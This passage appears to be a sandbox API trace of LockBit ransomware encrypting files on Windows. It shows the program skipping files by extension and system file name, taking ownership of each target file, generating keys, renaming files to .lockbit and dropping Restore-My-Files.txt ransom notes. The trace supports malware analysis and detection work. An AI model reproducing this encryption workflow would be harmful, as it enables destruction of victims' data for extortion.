NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.942] malloc (_Size=0xba) returned 0x77d800 [0085.942] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0085.943] free (_Block=0x77d800) [0085.943] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.943] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.943] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.944] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eac17af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eac17af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_highlights_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0085.944] lstrcmpiW (lpString1=".", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.944] lstrcmpiW (lpString1="..", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.944] PathFindExtensionW (pszPath="rectangle_highlights_Thumbnail.bmp") returned=".bmp" [0085.944] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0085.944] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0085.944] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0085.944] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0085.944] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0085.944] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0085.944] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0085.944] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0085.945] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0085.945] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0085.946] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0085.946] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_highlights_Thumbnail.bmp") returned 1 [0085.947] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.947] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.947] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.947] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.947] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_highlights_Thumbnail.bmp") returned 1 [0085.947] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0085.947] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.947] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned=".bmp" [0085.947] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0085.947] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0085.947] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0085.948] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0085.948] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp.lockbit") returned 87 [0085.948] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.949] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.949] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.949] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.949] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.950] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.950] RtlFreeAnsiString (AnsiString="\\") [0085.950] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b8) returned 0x0 [0085.950] malloc (_Size=0x200) returned 0x77d800 [0085.950] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.950] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.950] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.950] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.951] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.951] CloseHandle (hObject=0x3b8) returned 1 [0085.951] free (_Block=0x77d800) [0085.951] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.951] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.951] malloc (_Size=0x40068) returned 0x2031ed0 [0085.952] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=5072) returned 1 [0085.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0085.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0085.953] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0085.960] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.960] malloc (_Size=0xc4) returned 0x77d800 [0085.961] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0085.961] free (_Block=0x77d800) [0085.961] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.961] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.961] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.961] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eae790c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eae790c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_performance_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0085.961] lstrcmpiW (lpString1=".", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.962] lstrcmpiW (lpString1="..", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.962] PathFindExtensionW (pszPath="rectangle_performance_Thumbnail.bmp") returned=".bmp" [0085.962] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0085.962] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0085.962] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0085.962] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0085.962] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0085.963] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0085.963] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0085.963] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_performance_Thumbnail.bmp") returned 1 [0085.964] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.964] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.964] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.964] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.964] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_performance_Thumbnail.bmp") returned 1 [0085.964] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0085.964] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.964] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned=".bmp" [0085.964] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0085.964] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0085.964] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0085.965] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0085.965] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp.lockbit") returned 88 [0085.966] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.966] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.966] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.966] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.967] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.967] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.967] RtlFreeAnsiString (AnsiString="\\") [0085.967] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0085.967] malloc (_Size=0x200) returned 0x77d800 [0085.967] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.967] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.967] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.967] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.968] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.968] CloseHandle (hObject=0x3bc) returned 1 [0085.968] free (_Block=0x77d800) [0085.968] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0085.968] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.968] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.969] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5072) returned 1 [0085.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.970] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0086.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.022] malloc (_Size=0xc6) returned 0x1ff1e60 [0086.022] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xc6, FileInformationClass=0xa) returned 0xc0000008 [0086.022] free (_Block=0x1ff1e60) [0086.022] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.022] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.022] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd 